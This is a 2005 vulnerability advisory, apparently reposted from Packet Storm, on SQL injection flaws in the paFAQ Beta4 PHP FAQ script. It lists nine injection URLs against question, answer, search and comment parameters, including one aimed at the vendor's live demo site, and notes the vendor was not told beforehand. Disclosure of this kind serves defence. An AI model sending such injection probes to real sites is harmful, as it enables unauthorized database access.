Profile image for mrk studios Pi3cH on February 25, 2005
paFAQ Beta4 is susceptible to numerous SQL injection attacks.
Platforms
na
Category
webapps
Tags
exploit sql injection
Source
packetstormsecurity.org
Download
Exploit Code

paFAQBeta4.txt




[PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection
Date: 2005 February
Bug Number: 07

paFAQ
is a feature rich FAQ/Knowledge base system allowing webmasters to keep an organized database of Frequently Asked Questions. paFAQ also makes a great Knowledge Database for problems and solutions related to your scripts and programs. It runs using PHP and MySQL for speedy processing times.
More info @:
http://www.phparena.net/pafaq.php


Discussion:
--------------------
Sql Injection in 'question.php', 'answer.php', 'search.php', 'comment.php' that may allow a remote user to launch Sql injection attacks.
A form of attack on a database-driven Web site in which the attacker executes unauthorized SQL commands by taking advantage of insecure code on a system connected to the Internet, bypassing the firewall.

This vulnerability is reported to exist in paFAQ Beta4, other versions might
also be affected. 

Exploit:
--------------------
http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://www.example.com/index.php?act=Question&id=1&orderby='&order=DESC&limit=10
http://www.example.com/index.php?act=Answer&cid=1&id=1&offset='
http://www.example.com/index.php?act=Search&code=01&search_item='
http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4


Example:
--------------------
@ authors website!
http://demo.phparena.net/pafaq/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
-

Solution:
--------------------
in the code validate values with PHP patterns then process it.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: our security team users.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
Scripts authors were not be contacted for this bug.

Comments

blog comments powered by Disqus